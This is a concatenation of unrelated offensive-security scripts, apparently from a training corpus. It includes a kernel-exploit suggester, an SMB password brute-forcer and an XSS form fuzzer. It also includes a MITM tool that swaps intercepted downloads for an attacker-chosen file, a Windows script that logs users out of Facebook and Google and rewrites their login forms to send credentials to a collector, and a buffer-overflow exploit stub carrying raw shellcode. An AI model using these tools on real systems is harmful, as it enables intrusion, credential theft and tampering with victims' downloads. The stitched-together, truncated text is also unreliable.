"Linux Kernel <=2.6.28.3 set_selection() UTF-8 Off By One Local Exploit":{"minver":"0", "maxver":"2.6.28.3", "exploitdb":"9083", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Test Kernel Local Root Exploit 0day":{"minver":"2.6.18", "maxver":"2.6.30", "exploitdb":"9191", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0)":{"minver":"2.6.9", "maxver":"2.6.30", "exploitdb":"9208", "lang":"c", "keywords":{"loc":["pkg"], "val":"pulse"}},
"2.x sock_sendpage() Local Ring0 Root Exploit":{"minver":"2", "maxver":"2.99", "exploitdb":"9435", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.x sock_sendpage() Local Root Exploit 2":{"minver":"2", "maxver":"2.99", "exploitdb":"9436", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() ring0 Root Exploit (simple ver)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9479", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit":{"minver":"2.6", "maxver":"2.6.19", "exploitdb":"9542", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit (ppc)":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9545", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit (x86/x64)":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9574", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.19 udp_sendmsg Local Root Exploit":{"minver":"0", "maxver":"2.6.19", "exploitdb":"9575", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [2]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4/2.6 sock_sendpage() Local Root Exploit [3]":{"minver":"2.4", "maxver":"2.6.99", "exploitdb":"9641", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 Pipe.c Privelege Escalation":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"9844", "lang":"python", "keywords":{"loc":["kernel"], "val":"kernel"}},
"'pipe.c' Local Privilege Escalation Vulnerability":{"minver":"2.4.1", "maxver":"2.6.32", "exploitdb":"10018", "lang":"sh", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.6.18-20 2009 Local Root Exploit":{"minver":"2.6.18", "maxver":"2.6.20", "exploitdb":"10613", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Apache Spamassassin Milter Plugin Remote Root Command Execution":{"minver":"0", "maxver":"99", "exploitdb":"11662", "lang":"sh", "keywords":{"loc":["proc"], "val":"spamass-milter"}},
"<= 2.6.34-rc3 ReiserFS xattr Privilege Escalation":{"minver":"0", "maxver":"2.6.34", "exploitdb":"12130", "lang":"python", "keywords":{"loc":["mnt"], "val":"reiser"}},
"Ubuntu PAM MOTD local root":{"minver":"7", "maxver":"10.04", "exploitdb":"14339", "lang":"sh", "keywords":{"loc":["os"], "val":"ubuntu"}},
"< 2.6.36-rc1 CAN BCM Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36", "exploitdb":"14814", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Kernel ia32syscall Emulation Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"15023", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Linux RDS Protocol Local Privilege Escalation":{"minver":"0", "maxver":"2.6.36", "exploitdb":"15285", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"<= 2.6.37 Local Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15704", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.37-rc2 ACPI custom_method Privilege Escalation":{"minver":"0", "maxver":"2.6.37", "exploitdb":"15774", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to root Exploit":{"minver":"0", "maxver":"99", "exploitdb":"15916", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit)":{"minver":"0", "maxver":"99", "exploitdb":"15944", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"< 2.6.36.2 Econet Privilege Escalation Exploit":{"minver":"0", "maxver":"2.6.36.2", "exploitdb":"17787", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Sendpage Local Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"19933", "lang":"ruby", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.4.18/19 Privileged File Descriptor Resource Exhaustion Vulnerability":{"minver":"2.4.18", "maxver":"2.4.19", "exploitdb":"21598", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (1)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22362", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"2.2.x/2.4.x Privileged Process Hijacking Vulnerability (2)":{"minver":"2.2", "maxver":"2.4.99", "exploitdb":"22363", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"Samba 2.2.8 Share Local Privilege Elevation Vulnerability":{"minver":"2.2.8", "maxver":"2.2.8", "exploitdb":"23674", "lang":"c", "keywords":{"loc":["proc","pkg"], "val":"samba"}},
"open-time Capability file_ns_capable() - Privilege Escalation Vulnerability":{"minver":"0", "maxver":"99", "exploitdb":"25307", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
"open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
}
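# Note: the min/max version checks below compare version strings
# lexicographically, so e.g. "2.6.9" > "2.6.13" evaluates True. A minimal
# numeric-comparison sketch (hypothetical helper, not part of the original):
#   def vertuple(v):
#       return tuple(int(x) for x in v.split('.') if x.isdigit())
#   vertuple("2.6.9") < vertuple("2.6.13")   # -> True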
# variable declaration
os = sysInfo["OS"]["results"][0]
version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
langs = devTools["TOOLS"]["results"]
procs = getAppProc["PROCS"]["results"]
kernel = str(sysInfo["KERNEL"]["results"][0])
mount = driveInfo["MOUNT"]["results"]
#pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit applicability but may in future
# lists to hold ranked, applicable sploits
# note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
# all applicable exploits should be checked and this function could probably use some improvement
avgprob = []
highprob = []
for sploit in sploits:
lang = 0 # use to rank applicability of sploits
keyword = sploits[sploit]["keywords"]["val"]
sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"]
    # first check for kernel applicability
if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
# next check language applicability
if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
lang = 1 # language found, increase applicability score
elif sploits[sploit]["lang"] == "sh":
lang = 1 # language found, increase applicability score
elif (sploits[sploit]["lang"] in str(langs)):
lang = 1 # language found, increase applicability score
if lang == 0:
sploitout = sploitout + "**" # added mark if language not detected on system
# next check keyword matches to determine if some sploits have a higher probability of success
for loc in sploits[sploit]["keywords"]["loc"]:
if loc == "proc":
for proc in procs:
if keyword in proc:
highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
break
break
elif loc == "os":
if (keyword in os) or (keyword in kernel):
highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
break
elif loc == "mnt":
if keyword in mount:
highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
break
else:
avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
print
print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
for exploit in highprob:
print " - " + exploit
print
print " The following exploits are applicable to this kernel version and should be investigated as well"
for exploit in avgprob:
print " - " + exploit
print
print "Finished"
print bigline
| 66.841823 | 248 | 0.614172 |
PenetrationTestingScripts | #coding=utf-8
import time
import threading
from printers import printPink,printGreen
from impacket.smbconnection import *
from multiprocessing.dummy import Pool
from threading import Thread
class smb_burp(object):
def __init__(self,c):
self.config=c
self.lock=threading.Lock()
self.result=[]
self.lines=self.config.file2list("conf/smb.conf")
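        # Assumption based on the split(':') parsing in smb_l below:
        # conf/smb.conf holds one colon-separated credential pair per line,
        # e.g. admin:admin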
def smb_connect(self,ip,username,password):
crack =0
try:
smb = SMBConnection('*SMBSERVER', ip)
smb.login(username,password)
smb.logoff()
crack =1
except Exception, e:
self.lock.acquire()
print "%s smb 's %s:%s login fail " %(ip,username,password)
self.lock.release()
return crack
def smb_l(self,ip,port):
try:
for data in self.lines:
username=data.split(':')[0]
password=data.split(':')[1]
if self.smb_connect(ip,username,password)==1:
self.lock.acquire()
printGreen("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.result.append("%s smb at %s has weaken password!!-------%s:%s\r\n" %(ip,port,username,password))
self.lock.release()
break
except Exception,e:
pass
def run(self,ipdict,pinglist,threads,file):
if len(ipdict['smb']):
printPink("crack smb now...")
print "[*] start crack smb serice %s" % time.ctime()
starttime=time.time()
pool=Pool(threads)
for ip in ipdict['smb']:
pool.apply_async(func=self.smb_l,args=(str(ip).split(':')[0],int(str(ip).split(':')[1])))
pool.close()
pool.join()
print "[*] stop smb serice %s" % time.ctime()
print "[*] crack smb done,it has Elapsed time:%s " % (time.time()-starttime)
for i in xrange(len(self.result)):
self.config.write_file(contents=self.result[i],file=file)
if __name__ == '__main__':
import sys
sys.path.append("../")
from comm.config import *
c=config()
ipdict={'smb': ['10.211.55.3:445']}
pinglist=['101.201.177.35']
test=smb_burp(c)
    test.run(ipdict,pinglist,50,file="../result/test")
| 32.833333 | 125 | 0.529363 |
Python-Penetration-Testing-for-Developers | #!/usr/bin/python
msg = raw_input('Please enter the string to encode: ')
print "Your B64 encoded string is: " + msg.encode('base64') | 26 | 59 | 0.69403 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import sqlite3
import optparse
def isMessageTable(iphoneDB):
try:
conn = sqlite3.connect(iphoneDB)
c = conn.cursor()
c.execute('SELECT tbl_name FROM sqlite_master \
WHERE type==\"table\";')
for row in c:
if 'message' in str(row):
return True
except:
return False
def printMessage(msgDB):
try:
conn = sqlite3.connect(msgDB)
c = conn.cursor()
c.execute('select datetime(date,\'unixepoch\'),\
address, text from message WHERE address>0;')
for row in c:
date = str(row[0])
addr = str(row[1])
text = row[2]
print '\n[+] Date: '+date+', Addr: '+addr \
+ ' Message: ' + text
except:
pass
def main():
parser = optparse.OptionParser("usage %prog "+\
"-p <iPhone Backup Directory> ")
parser.add_option('-p', dest='pathName',\
type='string',help='specify skype profile path')
(options, args) = parser.parse_args()
pathName = options.pathName
if pathName == None:
print parser.usage
exit(0)
else:
dirList = os.listdir(pathName)
for fileName in dirList:
iphoneDB = os.path.join(pathName, fileName)
if isMessageTable(iphoneDB):
try:
print '\n[*] --- Found Messages ---'
printMessage(iphoneDB)
except:
pass
if __name__ == '__main__':
main()
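# Usage sketch (script name illustrative; point -p at an unencrypted iTunes
# backup directory, whose hashed filenames include the SMS store):
#   python iphone_messages.py -p /path/to/MobileSync/Backup/<UDID>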
| 24.612903 | 56 | 0.516698 |
cybersecurity-penetration-testing | import mechanize
import shelve
br = mechanize.Browser()
br.set_handle_robots( False )
url = raw_input("Enter URL ")
br.set_handle_equiv(True)
br.set_handle_gzip(True)
#br.set_handle_redirect(False)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.open(url)
s = shelve.open("mohit.xss",writeback=True)
for form in br.forms():
print form
list_a =[]
list_n = []
field = int(raw_input('Enter the number of fields that are "not readonly" '))
for i in xrange(0,field):
    na = raw_input('Enter the field name ("not readonly") ')
    ch = raw_input("Do you want to attack this field? press Y ")
if (ch=="Y" or ch == "y"):
list_a.append(na)
else :
list_n.append(na)
br.select_form(nr=0)
p =0
flag = 'y'
while flag =="y":
br.open(url)
br.select_form(nr=0)
for i in xrange(0, len(list_a)):
att=list_a[i]
br.form[att] = s['xss'][p]
for i in xrange(0, len(list_n)):
non=list_n[i]
br.form[non] = 'aaaaaaa'
print s['xss'][p]
br.submit()
ch = raw_input("Do you continue press y ")
p = p+1
flag = ch.lower()
| 19.755102 | 67 | 0.647638 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-10
# @File : index.py
# @Desc : ""
from flask import Blueprint, redirect, url_for
from fuxi.views.authenticate import login_check
index = Blueprint('index', __name__)
@index.route('/index')
@login_check
def view_index():
return redirect(url_for('dashboard.view_dashboard'))
@index.route('/')
@login_check
def view_base():
return redirect(url_for('dashboard.view_dashboard'))
| 19.125 | 56 | 0.659751 |
hackipy | #!/usr/bin/python3
try:
print("[>] Importing required modules")
import scapy.all as scapy
import netfilterqueue
import subprocess
import argparse
except ModuleNotFoundError:
print("[!] Missing modules, Exiting...")
exit()
else:
print("[>] Modules successfully imported")
########################################################################
# User Defined functions
########################################################################
def nothing():
"""I said Nothing ;)"""
pass
def is_root():
"""This function will check whether the script was run as root or not"""
current_user_id = int(subprocess.check_output(["id","-u"]))
if current_user_id == 0:
return True
else:
return False
def get_arguments():
"""This function will parse arguments from command line and return"""
parser = argparse.ArgumentParser(description="All arguments are optional")
parser.add_argument("-f","--filetype",help="File type to target for (.exe for example), uses some common filetypes if not provided",dest="filetype")
parser.add_argument("-r","--replace",help="Direct download URL for the file that would be replaced with original",dest="replace")
parser.add_argument("-io","--inout",help="This argument will order the program to intercept files from INPUT and OUTPUT chain (Packets of your computer) rather than FORWARD chain",dest='io',action='store_true')
parser.add_argument("-s","--silent",help="Show less output",dest="mute",action="store_true")
parser.add_argument("-d","--display",help="Display the contents of packet before and after intercepting, (Just for depth analysis, can clutter your screen with enormous output)",action="store_true",dest="display")
options = parser.parse_args()
return options.filetype, options.replace, options.io, options.mute, options.display
def check_packet(packet):
"""This function will be called on HTTP requests to check for request for a file"""
# Check the packet for file formats
for file_format in file_formats:
# If a file format request exists in the packet
if file_format in str(packet[scapy.Raw].load):
# Add it to the record
acknowledge_list.append(packet[scapy.TCP].ack)
return file_format
def modify_packet(packet):
"""This function will be called when a response to a requested file will be discovered. It
will manipulate the response"""
acknowledge_list.remove(packet[scapy.TCP].seq)
packet[scapy.Raw].load = f"HTTP/1.1 301 Moved Permanently\nLocation: {replace_url}\n"
# Removing the checksums
try:
del packet[scapy.IP].len
del packet[scapy.IP].chksum
del packet[scapy.TCP].chksum
except:
pass
# Return the modified packet
return packet
def process_packet(packet):
"""This function will be called on every packet in the queue, it will process the packets"""
# Convert the packet into scapy packet
scapy_packet = scapy.IP(packet.get_payload())
# Check if the packet has Raw layer
if scapy_packet.haslayer(scapy.Raw):
try:
# to check the packet fields to determine
# HTTP request
if scapy_packet[scapy.TCP].dport == 80:
discovered_file_format = check_packet(scapy_packet)
if discovered_file_format:
print(f"[+] Interceptable {discovered_file_format} found")
# HTTP response
elif scapy_packet[scapy.TCP].sport == 80:
# If it is a response to a recorded file request
if scapy_packet[scapy.TCP].seq in acknowledge_list:
# Intercept and manipulate it and set it to original packet
print("[+] Intercepting file")
print(f"[>] Original response : {scapy_packet.show()}") if display_intercepted_packets else nothing()
modified_packet = modify_packet(scapy_packet)
print(f"[>] Manipulated response : {modified_packet.show()}") if display_intercepted_packets else nothing()
packet.set_payload(bytes(modified_packet))
except IndexError:
# If these fields doesn't exist
pass
# Let it go
packet.accept()
########################################################################
# The main function
########################################################################
# Global
acknowledge_list = [] # Variable to store the ACK of file requests
# Getting arguments from command line
target_filetype, replace_url, io_chain, mute, display_intercepted_packets = get_arguments()
# Checking for root privileges
if is_root():
nothing()
else:
print("[!] Please run the script as root")
exit()
# Checking and validating provided arguments
file_formats = [target_filetype] if target_filetype else [".exe", ".pdf", ".zip", ".doc", ".jpg", ".mp4"]
while not replace_url:
print() # Line break
replace_url = input("[>] Enter the direct downloadable link/URL of the replace file : ")
display_intercepted_packets = True if display_intercepted_packets else False
io_chain = True if io_chain else False
mute = True if mute else False
# Feedback
print() if not mute else nothing()
print(f"[>] Filetype/s to target : {file_formats}") if not mute else nothing()
print(f"[>] Replace file URL : {replace_url}") if not mute else nothing()
print(f"[>] Display intercepted packets : {display_intercepted_packets}") if not mute else nothing()
# Creating the queue
print()
print("[+] Creating a queue") if not mute else nothing()
if io_chain:
subprocess.call("iptables -I INPUT -j NFQUEUE --queue-num 1",shell=True)
subprocess.call("iptables -I OUTPUT -j NFQUEUE --queue-num 1",shell=True)
else:
subprocess.call("iptables -I FORWARD -j NFQUEUE --queue-num 1",shell=True)
# Binding with the queue
queue = netfilterqueue.NetfilterQueue()
queue.bind(1,process_packet)
print("[+] Queue created and binded with program")
print() if not mute else nothing()
# Running the queue
try:
queue.run()
except KeyboardInterrupt:
print("[+] Unbinding the queue")
queue.unbind()
# Flushing the ip tables and exiting
print("[+] Flushing IP tables")
subprocess.call("iptables --flush",shell=True) | 37.676829 | 217 | 0.638127 |
cybersecurity-penetration-testing | import multiprocessing
import time
def f(x):
t = 0
while t < 10:
print "Running ", x, "-", t
t += 1
time.sleep(x)
if __name__ == '__main__':
p1 = multiprocessing.Process(target=f, args=(1,))
p2 = multiprocessing.Process(target=f, args=(2,))
p1.start()
time.sleep(0.5)
p2.start()
while True:
if not p2.is_alive():
p1.terminate()
break
print "Both processes finished"
| 18.291667 | 53 | 0.528139 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-08 05:58
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('nmaper', '0007_nmapscan_slug_text'),
]
operations = [
migrations.RemoveField(
model_name='nmapscan',
name='slug_text',
),
migrations.AddField(
model_name='nmapscan',
name='slug',
field=models.SlugField(default='', max_length=128),
preserve_default=False,
),
]
| 22.269231 | 63 | 0.566225 |
cybersecurity-penetration-testing | import win32com.client
import time
import urlparse
import urllib
data_receiver = "http://localhost:8080/"
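# Assumption: a listener must be running at data_receiver to capture the
# re-targeted login form submissions (any simple HTTP server that logs
# incoming request data will do).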
target_sites = {}
target_sites["www.facebook.com"] = \
{"logout_url" : None,
"logout_form" : "logout_form",
"login_form_index": 0,
"owned" : False}
target_sites["accounts.google.com"] = \
{"logout_url" : "https://accounts.google.com/Logout?hl=en&continue=https://accounts.google.com/ServiceLogin%3Fservice%3Dmail",
"logout_form" : None,
"login_form_index" : 0,
"owned" : False}
target_sites["www.gmail.com"] = target_sites["accounts.google.com"]
target_sites["mail.google.com"] = target_sites["accounts.google.com"]
clsid='{9BA05972-F6A8-11CF-A442-00A0C90A8F39}'
windows = win32com.client.Dispatch(clsid)
def wait_for_browser(browser):
# wait for the browser to finish loading a page
while browser.ReadyState != 4 and browser.ReadyState != "complete":
time.sleep(0.1)
return
while True:
for browser in windows:
url = urlparse.urlparse(browser.LocationUrl)
if url.hostname in target_sites:
if target_sites[url.hostname]["owned"]:
continue
# if there is an URL we can just redirect
if target_sites[url.hostname]["logout_url"]:
browser.Navigate(target_sites[url.hostname]["logout_url"])
wait_for_browser(browser)
else:
# retrieve all elements in the document
full_doc = browser.Document.all
# iterate looking for the logout form
for i in full_doc:
try:
# find the logout form and submit it
if i.id == target_sites[url.hostname]["logout_form"]:
i.submit()
wait_for_browser(browser)
except:
pass
try:
# now we modify the login form
login_index = target_sites[url.hostname]["login_form_index"]
login_page = urllib.quote(browser.LocationUrl)
browser.Document.forms[login_index].action = "%s%s" % (data_receiver, login_page)
target_sites[url.hostname]["owned"] = True
except:
pass
    time.sleep(5)
| 29.3375 | 136 | 0.550289 |
SNAP_R | # THIS PROGRAM IS TO BE USED FOR EDUCATIONAL PURPOSES ONLY.
# CAN BE USED FOR INTERNAL PEN-TESTING, STAFF RECRUITMENT, SOCIAL ENGAGEMENT
import sklearn.pipeline
import sklearn.metrics
import sklearn.cluster
import datetime
import sklearn.grid_search
import sklearn.base
import sklearn.feature_extraction
def create_transformers():
return [
('created_at', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'created_at')),
('preprocessor', CreatedAtPreprocessor()),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('followers_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'followers_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('listed_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'listed_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('favourites_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'favourites_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('statuses_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'statuses_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('friends_count', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_intfield, 'friends_count')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('location', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_location, 'location')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_background_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'profile_background_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_link_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'profile_link_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_sidebar_fill_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field,
'profile_sidebar_fill_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_sidebar_border_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field,
'profile_sidebar_border_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_text_color', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'profile_text_color')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('verified', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'verified')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('default_profile_image', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'default_profile_image')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('default_profile', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'default_profile')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('geo_enabled', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'geo_enabled')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('contributors_enabled', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'contributors_enabled')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('protected', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'protected')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('is_translator', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'is_translator')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('lang', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'lang')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('time_zone', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_time_zone, 'time_zone')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('has_extended_profile', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'has_extended_profile')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_use_background_image', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field,
'profile_use_background_image')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('is_translation_enabled', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'is_translation_enabled')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
])),
('profile_background_tile', sklearn.pipeline.Pipeline([
('selector', ItemSelector(get_field, 'profile_background_tile')),
('vectorizer', sklearn.feature_extraction.DictVectorizer())
]))
]
class ItemSelector(sklearn.base.BaseEstimator,
sklearn.base.TransformerMixin):
''' For data grouped by feature, select subset of data '''
def __init__(self, func, field_name=None):
self.func = func
self.field_name = field_name
def fit(self, X, y=None):
return self
def transform(self, data_dict):
return self.func(data_dict, self.field_name)
class CreatedAtPreprocessor(sklearn.base.BaseEstimator,
sklearn.base.TransformerMixin):
''' Preprocess features from created_at document '''
def fit(self, X):
return self
def transform(self, corpus):
for document in corpus:
yield self._transform_document(document)
def _transform_document(self, document,
hours_in_day=24, seconds_in_hour=3600):
current_time = datetime.datetime.now()
t_delta = current_time - self._convert(document['created_at'])
document['created_at'] = \
t_delta.days * hours_in_day * seconds_in_hour + t_delta.seconds
return document
def _convert(self, time_string):
return datetime.datetime.strptime(time_string,
"%a %b %d %H:%M:%S +0000 %Y")
def get_intfield(corpus, field_name):
for document in corpus:
yield {field_name: int(document[field_name])}
def get_field(corpus, field_name):
for document in corpus:
yield {field_name: document[field_name]}
def get_location(corpus, field_name):
for document in corpus:
if document[field_name]:
yield {field_name: 1}
else:
yield {field_name: 0}
def get_time_zone(corpus, field_name):
for document in corpus:
if document[field_name]:
yield {field_name: document[field_name]}
else:
yield {field_name: 'None'}
class Parameterize(sklearn.base.ClusterMixin):
def __init__(self, scoring=sklearn.metrics.silhouette_score, n_iter=4):
self.parameters = {
'scoring': scoring,
'n_iter': n_iter
}
def clusterer_choices(self):
parameter_distributions = {
sklearn.cluster.KMeans: {
'n_clusters': [2, 3, 4, 5],
'init': ['k-means++'],
'n_init': [10],
'max_iter': [300],
'tol': [0.0001],
'precompute_distances': ['auto']
},
sklearn.cluster.Birch: {
'threshold': [0.1, 0.50],
'branching_factor': [50],
'n_clusters': [2, 3, 4, 5],
'compute_labels': [True],
'copy': [True]
}
}
return parameter_distributions.items()
def fit(self, X, y=None):
silhouette_scores = {}
scored_models = {}
for clusterer_algo, clusterer_hyperparams in self.clusterer_choices():
for hyperparam_grid in list(sklearn.grid_search.ParameterSampler(
clusterer_hyperparams, n_iter=self.parameters['n_iter'])):
clusterer = clusterer_algo(**hyperparam_grid)
cluster_labels = clusterer.fit_predict(X)
silhouette_scores[clusterer] = \
self.parameters['scoring'](X, cluster_labels)
scored_models[clusterer] = clusterer
self.cluster_choice = scored_models[max(silhouette_scores,
key=silhouette_scores.get)]
return self
def predict(self, X, y=None):
return self.cluster_choice.predict(X)
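# Usage sketch (hypothetical feature matrix X, e.g. produced by a
# FeatureUnion over create_transformers()):
#   model = Parameterize(n_iter=4).fit(X)
#   labels = model.predict(X)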
| 40.521739 | 78 | 0.585087 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
buf = ""
buf += "\xd9\xc8\xbd\xad\x9f\x5d\x89\xd9\x74\x24\xf4\x5a\x33"
buf += "\xc9\xb1\x52\x31\x6a\x17\x03\x6a\x17\x83\x6f\x9b\xbf"
buf += "\x7c\x93\x4c\xbd\x7f\x6b\x8d\xa2\xf6\x8e\xbc\xe2\x6d"
buf += "\xdb\xef\xd2\xe6\x89\x03\x98\xab\x39\x97\xec\x63\x4e"
buf += "\x10\x5a\x52\x61\xa1\xf7\xa6\xe0\x21\x0a\xfb\xc2\x18"
buf += "\xc5\x0e\x03\x5c\x38\xe2\x51\x35\x36\x51\x45\x32\x02"
buf += "\x6a\xee\x08\x82\xea\x13\xd8\xa5\xdb\x82\x52\xfc\xfb"
buf += "\x25\xb6\x74\xb2\x3d\xdb\xb1\x0c\xb6\x2f\x4d\x8f\x1e"
buf += "\x7e\xae\x3c\x5f\x4e\x5d\x3c\x98\x69\xbe\x4b\xd0\x89"
buf += "\x43\x4c\x27\xf3\x9f\xd9\xb3\x53\x6b\x79\x1f\x65\xb8"
buf += "\x1c\xd4\x69\x75\x6a\xb2\x6d\x88\xbf\xc9\x8a\x01\x3e"
buf += "\x1d\x1b\x51\x65\xb9\x47\x01\x04\x98\x2d\xe4\x39\xfa"
buf += "\x8d\x59\x9c\x71\x23\x8d\xad\xd8\x2c\x62\x9c\xe2\xac"
buf += "\xec\x97\x91\x9e\xb3\x03\x3d\x93\x3c\x8a\xba\xd4\x16"
buf += "\x6a\x54\x2b\x99\x8b\x7d\xe8\xcd\xdb\x15\xd9\x6d\xb0"
buf += "\xe5\xe6\xbb\x17\xb5\x48\x14\xd8\x65\x29\xc4\xb0\x6f"
buf += "\xa6\x3b\xa0\x90\x6c\x54\x4b\x6b\xe7\x9b\x24\x89\x67"
buf += "\x73\x37\x6d\x99\xd8\xbe\x8b\xf3\xf0\x96\x04\x6c\x68"
buf += "\xb3\xde\x0d\x75\x69\x9b\x0e\xfd\x9e\x5c\xc0\xf6\xeb"
buf += "\x4e\xb5\xf6\xa1\x2c\x10\x08\x1c\x58\xfe\x9b\xfb\x98"
